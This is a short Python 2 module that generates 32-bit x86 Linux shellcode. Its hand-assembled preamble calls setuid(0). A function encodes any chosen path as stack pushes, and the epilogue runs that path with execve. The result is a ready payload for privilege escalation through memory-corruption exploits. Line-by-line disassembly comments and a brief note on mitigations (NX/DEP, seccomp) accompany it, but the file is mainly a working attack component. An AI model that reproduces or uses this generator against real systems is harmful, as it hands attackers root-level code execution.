__author__ = "Felix Hellman, Hannes Knutsson"
__credits__ = ["Felix Hellman", "Hannes Knutsson"]

# NOTE: this module is Python 2 source. `str` is a byte string here, and
# generatePayload() below depends on xrange() and str.decode("hex"), neither
# of which exists in Python 3.
#
# Both strings below are raw 32-bit x86 Linux machine code, one instruction
# per line, assembled by hand as "\x.." escapes; the comment on each line is
# the AT&T-syntax disassembly. Defensive note: because the preamble and the
# epilogue are fixed byte sequences, anything this module emits carries a
# static signature, and NX/DEP together with seccomp filtering of
# setuid/execve are the usual mitigations for this class of stack shellcode.

# Preamble definition: setuid(0), then load the execve syscall number and
# push the NUL that terminates the path string generatePayload() pushes next.
payload_preamble = "\x6a\x46" #push $0x46      -- 0x46 is the i386 setuid syscall number
payload_preamble+= "\x58" #pop %eax            -- eax = 0x46 (syscall number register)
payload_preamble+= "\x31\xdb" #xor %ebx,%ebx   -- ebx = 0: uid argument, i.e. setuid(0) / root
payload_preamble+= "\xcd\x80" #int $0x80       -- perform the setuid syscall
payload_preamble+= "\x31\xd2" #xor %edx,%edx   -- edx = 0; reused as NUL terminator and, still 0 at the
                                               #   final int $0x80, as execve's third argument (envp)
payload_preamble+= "\x6a\x0b" #push $0xb       -- 0xb is the i386 execve syscall number
payload_preamble+= "\x58" #pop %eax            -- eax = 0xb
payload_preamble+= "\x52" #push %edx           -- push a NUL so the path pushed afterwards is terminated

# Epilogue definition: at this point %esp points at the first byte of the
# pushed path string. Build argv = {path, NULL} on the stack and call execve.
payload_epilogue = "\x89\xe3" #mov %esp,%ebx   -- ebx = address of the path string (execve arg 1, filename)
payload_epilogue+= "\x52" #push %edx           -- NULL that ends the argv array
payload_epilogue+= "\x53" #push %ebx           -- argv[0] = pointer to the path string
payload_epilogue+= "\x89\xe1" #mov %esp,%ecx   -- ecx = &argv[0] (execve arg 2, argv)
payload_epilogue+= "\xcd\x80" #int $0x80       -- execve(path, argv, envp=0)
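def reverseString(input):
    """Return *input* with its characters in reverse order.

    Args:
        input: the string to reverse (a byte string under Python 2, where
            this module is meant to run; the name shadows the builtin but
            is kept for caller compatibility).

    Returns:
        A new string of the same length with the last character first;
        the empty string reverses to itself.
    """
    # A reversing slice runs on both Python 2 and 3, whereas the original
    # index loop used the Python 2-only xrange() and built the result by
    # per-character concatenation.
    return input[::-1]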
def generatePayload(str_input):
    """Encode *str_input* as x86 `push imm32` instructions between the module's preamble and epilogue.

    This is the classic "push the string onto the stack" encoding: the input
    is left-padded with "/" to a multiple of four bytes (presumably because
    repeated slashes do not change how a path resolves -- confirm), the padded
    string is reversed, and each group of four characters is emitted as the
    byte 0x68 (push imm32) followed by those four bytes in their original
    order. Once every push has executed the string lies in memory in order
    with %esp pointing at its first byte, which is what payload_epilogue
    expects (see the module-level definitions).

    Args:
        str_input: the path string to embed (Python 2 byte string).

    Returns:
        payload_preamble + the generated pushes + payload_epilogue, as one
        byte string.

    Caveats visible in the code:
      * Python 2 only: uses xrange() and str.decode("hex").
      * hex(ord(c)) is assumed to give exactly two hex digits, i.e. every
        character must be >= 0x10; a shorter result would misalign the
        two-digit pairing in the inner loop.
      * `counter` and `hexString` are assigned but never read.
    """
    counter = 0
    input = str_input
    remainder = len(input) % 4
    #Make sure input is even with 4 bytes: left-pad with "/" up to the next multiple of four
    if remainder != 0:
        padding = "/"*(4 - remainder)
        input = padding + input
    #Reverse string, so the groups of four come out last-group-first (stack grows downwards)
    output = reverseString(input)
    hexString = "";
    index = 0
    codeList = []
    payload_mid = "";
    for c in output:
        # Two-digit hex of this character, "0x" prefix stripped
        codeList.append(str(hex(ord(c))).replace("0x",""))
        index += 1
        if index % 4 == 0:
            # Re-reverse this group of four so its bytes are in original string order.
            # `list += str` extends the list with the individual hex digits, so
            # reversedBytes is a flat list of single characters, e.g. ['2','f','2','f',...].
            reversedBytes = []
            for i in xrange(len(codeList)-1,-1,-1):
                reversedBytes += codeList[i];
            # 0x68 = push imm32 opcode; the next four bytes are its immediate
            payload_mid += "68"
            counter += 1
            # Re-pair the single hex digits into two-digit bytes (the ""+ is a no-op)
            for i in xrange(0,len(reversedBytes)-1,2):
                payload_mid += ""+reversedBytes[i] + reversedBytes[i+1]
            del codeList[:]
    # Turn the hex text into raw bytes (Python 2 str.decode("hex"))
    payload_mid = payload_mid.decode("hex")
    return payload_preamble + payload_mid + payload_epilogue